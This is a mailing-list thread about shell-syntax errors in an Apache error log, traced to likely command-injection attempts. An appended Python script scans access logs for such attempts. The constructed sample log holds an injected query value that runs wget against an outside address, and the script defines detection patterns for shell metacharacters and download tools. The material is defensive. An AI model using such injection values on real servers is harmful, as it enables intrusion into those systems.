
RE: Weird message in my apache error log



What does your application do? It looks like it is finding a shell script
somewhere? We've seen similar things when executing CGIs and not filtering
the input data so well. Lines 22 and 24 make me think there is a script
somewhere rather than arbitrary GET data.

> -----Original Message-----
> From: Brian Brazil [mailto:bbrazil@netsoc.tcd.ie]
> Sent: Tuesday, January 31, 2006 4:53 PM
> To: debian-security@lists.debian.org
> Subject: Re: Weird message in my apache error log
> 
> On Tue, Jan 31, 2006 at 11:19:45PM +0100, Josep Serrano wrote:
> > Hello all. I got some weird entries in my apache error log.
> > Any clues about what/where/how ?
> >
> > sh: -c: line 22: unexpected EOF while looking for matching ``'
> > sh: -c: line 24: syntax error: unexpected end of file
> >
> > sh: -c: line 0: unexpected EOF while looking for matching `"'
> > sh: -c: line 1: syntax error: unexpected end of file
> 
> Looks like someone is trying to do arbitrary command execution. You
> probably have a script somewhere that says `command $_GET['var']`, and
> someone is passing ';attack' as var, but it isn't quite working.
> 
> I suggest using the audit log feature of mod_security, or just grepping
> through your access logs for anything odd ('wget' is a good search
> term).
> 
> You might have a bot on the system, check for any odd network
> connections, especially to port 6667 (IRC). Also look for www-data owned
> files in /tmp.
> 
> Brian
> 
> --
> Website: http://www.netsoc.tcd.ie/~bbrazil
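
The access-log check suggested in the thread, as an added example that is not part of the original messages: it URL-decodes each request's query string and flags shell metacharacters, download tool names, and the odd number of backticks or double quotes that makes `sh -c` report "unexpected EOF while looking for matching". The log lines, the `/cgi-bin/test.cgi` path and the addresses are constructed, and the Apache combined log format is assumed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = """\
198.51.100.7 - - [31/Jan/2006:22:10:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Jan/2006:22:11:14 +0100] "GET /cgi-bin/test.cgi?var=%3Battack%60 HTTP/1.1" 200 312 "-" "-"
198.51.100.9 - - [31/Jan/2006:22:11:15 +0100] "GET /cgi-bin/test.cgi?var=%22%3Bwget%20http://192.0.2.10/x HTTP/1.1" 200 312 "-" "-"
"""

# client, timestamp and request target from one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:[A-Z]+) (\S+)[^"]*"')
# '&' is left out on purpose: it is the normal query-string separator
METACHARS = re.compile(r'[;|`]|\$\(')
TOOLS = re.compile(r'\b(wget|curl)\b', re.I)


def classify(query):
    """Return the reasons a URL-decoded query string looks like shell injection."""
    reasons = []
    if METACHARS.search(query):
        reasons.append("shell metacharacter")
    if TOOLS.search(query):
        reasons.append("download tool")
    # An odd number of ` or " leaves the shell waiting for the closing quote,
    # which is what produces the "unexpected EOF" lines in the error log.
    for quote in ('`', '"'):
        if query.count(quote) % 2:
            reasons.append("unbalanced " + quote)
    return reasons


def scan(log_text):
    """Return (client, timestamp, decoded query, reasons) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, stamp, target = m.groups()
        query = unquote_plus(urlsplit(target).query)
        reasons = classify(query)
        if reasons:
            hits.append((client, stamp, query, reasons))
    return hits


if __name__ == "__main__":
    for client, stamp, query, reasons in scan(SAMPLE_LOG):
        print(stamp, client, repr(query), ", ".join(reasons))
```

The timestamps of the hits can then be lined up with the `sh: -c:` entries in the error log to find which script is passing request data to a shell.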


